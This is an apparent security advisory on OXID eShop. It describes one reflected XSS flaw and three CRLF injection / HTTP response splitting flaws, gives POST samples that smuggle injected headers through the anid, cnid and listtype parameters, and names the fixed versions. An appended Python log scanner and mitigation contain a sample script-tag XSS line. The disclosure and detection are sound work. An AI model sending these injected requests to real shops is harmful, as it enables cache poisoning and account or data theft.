# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)

###########################################################################################################
# XSS vulnerability
###########################################################################################################

Under certain circumstances, an attacker can trick a user into entering a specially crafted URI or
clicking on a malformed link to exploit a cross-site scripting vulnerability that theoretically can be
used to gain unauthorized access to a user account or to collect sensitive information about this user.

SAMPLE:
-------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------

Products:
  OXID eShop Enterprise Edition
  OXID eShop Professional Edition
  OXID eShop Community Edition

Releases:
  All previous releases

Platforms:
  All releases are affected on all platforms.

STATE:
  - Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.
  - A fix for OXID eShop version 4.6.8 is available.

Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001

###########################################################################################################
###########################################################################################################

###########################################################################################################
# Multiple CRLF injection / HTTP response splitting
###########################################################################################################

Under certain circumstances (depending on the browser, OS and PHP version), an attacker can trick a user
into entering a specially crafted URI or clicking on a malformed link to exploit an HTTP response
splitting vulnerability that theoretically can be used to poison caches, gain unauthorized access to a
user account or collect sensitive information about this user.

A possible exploit by passing such a malformed URI could lead to:
  - the return of a blank page or a PHP error (depending on the server configuration)
  - unsolicited browser cookies being set

Products:
  OXID eShop Enterprise Edition
  OXID eShop Professional Edition
  OXID eShop Community Edition

Releases:
  All previous releases

Platforms:
  All releases are affected on all platforms.

STATE:
  - Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.
  - A fix for OXID eShop version 4.6.8 is available.

Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002

Vulnerability details:

###########################################################################################################
# 1 # CRLF injection / HTTP response splitting
###########################################################################################################

PATH:      ROOT/index.php
PARAMETER: anid

CONCEPT:
--------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------

###########################################################################################################
###########################################################################################################

###########################################################################################################
# 2 # CRLF injection / HTTP response splitting
###########################################################################################################

PATH:      ROOT/index.php
PARAMETER: cnid

CONCEPT:
--------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

###########################################################################################################
###########################################################################################################

###########################################################################################################
# 3 # CRLF injection / HTTP response splitting
###########################################################################################################

PATH:      ROOT/index.php
PARAMETER: listtype

CONCEPT:
--------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

###########################################################################################################
###########################################################################################################

Many greetings to all lunatics and freaks out there who live daily in the code, like me and my partners.
A thanks to the developers, who have responded relatively quickly.

Cheers!
//sToRm
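Added example, not part of the advisory: a small Python detector a shop operator could run over access logs for the two bulletins above, flagging URL-decoded parameter values that carry CR/LF (the response-splitting pattern in anid, cnid and listtype) or HTML markup (the searchtag XSS), plus the header-side mitigation of rejecting any value with a line break. The log lines, IP addresses and the parameter-to-bulletin mapping are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the bulletins name as affected; every other parameter is checked too.
CRLF_PARAMS = {"anid", "cnid", "listtype"}   # HTTP response splitting (2014-002)
XSS_PARAMS = {"searchtag"}                    # reflected XSS (2014-001)

# Constructed sample access-log lines (not from the advisory); only the
# parameter names and encodings mirror what the bulletins describe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2014:10:01:02 +0100] "GET /tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=shoes HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2014:10:01:09 +0100] "GET /tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2014:10:02:15 +0100] "GET /index.php?actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2014:10:02:40 +0100] "GET /index.php?cl=details&anid=0&cnid=root&listtype=list HTTP/1.1" 200 8800
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def find_suspicious(target):
    """Return (param, reason) pairs for decoded values carrying CR/LF or markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if "\r" in value or "\n" in value:
            # A line break is never legitimate in a value that is copied into a header.
            hits.append((name, "crlf-known" if name in CRLF_PARAMS else "crlf"))
        elif "<" in value or "javascript:" in value.lower():
            hits.append((name, "xss-known" if name in XSS_PARAMS else "xss"))
    return hits


def scan_log(text):
    """Return (line_no, method, hits) for every log line with at least one hit."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            hits = find_suspicious(m.group("target"))
            if hits:
                out.append((n, m.group("method"), hits))
    return out


def safe_header_value(value):
    """Mitigation side: refuse, rather than silently strip, CR/LF before setting a header."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value
```

Values arriving in a POST body (as in the SAMPLE requests above) are not in a standard access log, so the same check belongs in the application or a proxy that sees the body.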